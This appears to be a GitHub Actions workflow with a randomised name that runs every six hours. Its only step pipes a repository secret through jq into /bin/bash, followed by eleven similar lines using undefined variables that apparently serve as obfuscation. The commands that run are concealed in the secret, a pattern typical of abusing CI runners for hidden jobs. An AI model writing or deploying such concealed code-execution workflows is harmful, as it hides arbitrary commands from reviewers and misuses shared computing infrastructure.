name: shangdongpeng4637

on:
  workflow_dispatch:
  schedule:
    - cron: '28 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shangdongpeng4637
        env:
          bz1: ${{ secrets.bz1 }}
        run: |
          echo $bz1 | jq -r .i8559 | /bin/bash
          echo $o08 | jq -r .p03020 | /bin/bash
          echo $frtdc15679 | jq -r .itnrt96 | /bin/bash
          echo $t08 | jq -r .zqx8619 | /bin/bash
          echo $dbuof1223 | jq -r .sgjm9 | /bin/bash
          echo $pg3992 | jq -r .saa4 | /bin/bash
          echo $edy551 | jq -r .g76 | /bin/bash
          echo $fbar3611 | jq -r .yx466 | /bin/bash
          echo $if44897 | jq -r .thom32146 | /bin/bash
          echo $jkfl951 | jq -r .pm9513 | /bin/bash
          echo $jli2510 | jq -r .ayjm451 | /bin/bash
          echo $tg703 | jq -r .hlww96886 | /bin/bash

